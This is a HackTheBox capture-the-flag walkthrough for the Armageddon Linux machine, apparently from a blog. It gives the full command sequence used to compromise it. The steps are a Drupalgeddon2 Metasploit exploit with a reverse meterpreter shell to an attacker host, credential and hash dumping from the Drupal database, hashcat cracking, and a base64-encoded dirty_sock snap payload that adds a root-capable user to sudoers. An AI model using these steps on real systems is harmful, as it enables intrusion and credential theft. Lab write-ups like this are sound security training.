Armageddon HackTheBox WalkThrough
This is Armageddon HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Armageddon HackTheBox machine. Before starting let us know something about this machine. It is a Linux box with IP address 10.10.10.233 and difficulty easy assigned by its maker.
First of all connect your PC with HackTheBox VPN and make sure your connectivity with Armageddon machine by pinging its IP 10.10.10.233. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning also. I have used nmap for this task and the result is given below:-
Scanning
$ sudo nmap -sC -sV -sT -oA nmap/Armageddon 10.10.10.233
Nmap found ports 22 and 80 as open. OpenSSH 7.4 is running on port 22 and Apache2 web server is running on port 80. Also, nmap script http-generator revealed that the website hosted on this web server is created using Drupal 7 CMS. Drupal is an Open Source CMS which gives us facility to create attractive website just like WordPress CMS. Ongoing to the URL http://10.10.10.233 found Drupal Login page.
I wanted to find the exact version of this CMS so that I can search for available exploits. Ongoing to the URL http://10.10.10.233/robots.txt found /Changelog.txt file. Changelog.txt file usually includes records of changes such as bug fixes, new features, etc., added to the application. Ongoing to http://10.10.10.233/CHANGELOG.txt found that installed version of Drupal is 7.56 which was released on 21st of June 2017.
Tip: Whenever you find that any Open Source CMS is being used simply go to their GitHub repository and check their directory structure and then check for the same file in your vulnerable website. Don’t directory bruteforce on the vulnerable site because in Open Source CMS everything is publicly available.
Let us search for available exploits using $ searchsploit.
Searching for Drupal Exploits
$ searchsploit drupal 7.56
Searchsploit found many number of exploits. My first focus was on Metasploit because it makes our work a lot easier. When I searched Drupal exploit in metasploit it found many exploits. Drupalgeddon was my focus because its suffix matches with this machine name. After some trial and error I got the exploit exploit/unix/webapp/drupal_drupalgeddon2 worked and gave me shell. So let us get user shell.
Getting User Shell
msf6 > search drupal
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.233
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.10.14.10
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
meterpreter > sysinfo
We have successfully got user shell. Let us upgrade the shell to fully qualified Linux shell so that we can proceed for higher level task.
Upgrading Shell
meterpreter > shell
~/bin/bash -i
bash-4.2$ export TERM=xterm
Note: $ python3 -c 'import pty; pty.spawn("/bin/bash")' won’t work.
After some initial enumeration found some database login credential inside file settings.php.
$ cat /var/www/html/sites/default/settings.php
The credentials are:
database : drupal
username : drupaluser
password : CQHEy@9M*m23gBVj
host : localhost
port : 3306
driver : mysql
My next step is to find whether any database server is running locally so that I can use this credentials to dump other user’s login credential.
$ netstat -punta
$ netstat command found that port 3306 is listening locally. So let us login into MySQL server and see what is present there.
logging into mysql & dumping user creds
Since we don’t have a fully qualified Linux shell that why we can’t spawn MySQL prompt. We have to run SQL command in one line. For more info on using MySQL command in one line check this article.
$ mysql -u'drupaluser' -p'CQHEy@9M*m23gBVj' -e 'show databases;'
$ mysql -u'drupaluser' -p'CQHEy@9M*m23gBVj' -D drupal -e 'show tables;'
$ mysql -u'drupaluser' -p'CQHEy@9M*m23gBVj' -D drupal -e 'select name,pass from users;'
———–Snip————
We got hash of user brucetherealadmin which is $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt. Let us identify the hash so that we can go for cracking using $ hashcat (an offline password cracker).
Identifying Hash
Hash identifier found its algorithm to be of Drupal7. Let us crack it.
Cracking Hash
$ hashcat -a 3 -m 7900 '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt' /usr/share/wordlists/rockyou.txt
$ hashcat -a 3 -m 7900 '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt' –show
—————–Snip—————–
Hashcat found password of brucetherealadmin to be booboo. Let us check whether brucetherealadmin user exist or not.
$ cat /etc/passwd | grep /bash
It exist and it also has bash shell. Let us SSH into it using $ssh (OpenSSH remote login client) command.
SSH into user Brucetherealadmin
$ ssh [email protected]
~booboo
We are now logged in as user brucetherealadmin. Let us capture user flag.
Capture User Flag
$ cat user.txt
Privilege Escalation
To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation.
Finding PrivEsc Vector
$ sudo -l
$ sudo -l command revealed that user brucetherealadmin can run (root) NOPASSWD: /usr/bin/snap install * on armageddon as root. In other words, we can say that user brucetherealadmin can install any snap package in armageddon. You can think snap package like a docker package. Snap packages are complete in itself along with their dependencies and run in sandboxed environment in different Linux distributions. For more info check this video on YouTube.
$ snap version command revealed the installed version of snap and snapd to be 2.47.1-1.e17.
After some googling found a local privilege escalation exploit for snapd 2.47. For more details on how this exploit work and about vulnerability check this link. When I tried to get root shell using this exploit I would easily got root. So here our potential PrivEsc vector is Privilege Escalation by Exploiting Known Vulnerability in Software and the software is snapd.
To get root shell do the following.
Getting Root Shell
$ cd /dev/shm/
$ python -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A" * 4256 + "=="' | base64 -d > exploit.snap$ ls
$ sudo /usr/bin/snap install --devmode exploit.snap
$ su dirty_sock
~dirty_sock
$ sudo -i
# whoami && id
We are root now. Let us capture root flag.
Capture Root Flag
$ cat root.txt
This was how I rooted to Armageddon HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. For any query and walkthrough related doubt feel free to write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.
